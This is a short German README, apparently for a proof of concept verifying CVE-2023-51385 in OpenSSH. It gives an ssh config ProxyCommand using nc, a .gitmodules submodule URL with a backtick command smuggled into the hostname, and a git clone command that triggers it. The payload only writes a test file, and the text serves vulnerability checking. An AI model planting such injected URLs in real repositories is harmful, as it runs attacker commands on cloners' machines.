
Eine Verifizierung für CVE-2023-51385
Zuerst muss in der Datei ~/.ssh/config der folgende Inhalt hinzugefügt werden:
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
In der .gitmodules-Datei besteht in der Anweisung eine Befehlsinjektion:
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
Nach der Konfiguration führen Sie den folgenden Befehl aus, um die Auslösung zu starten:
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules
Bei erfolgreicher Ausführung wird im Verzeichnis CVE-2023-51385_test die Datei cve.txt erzeugt.

Hinweis: OpenSSH benötigt <9.6p1
Weitere Details finden Sie in diesem Blog: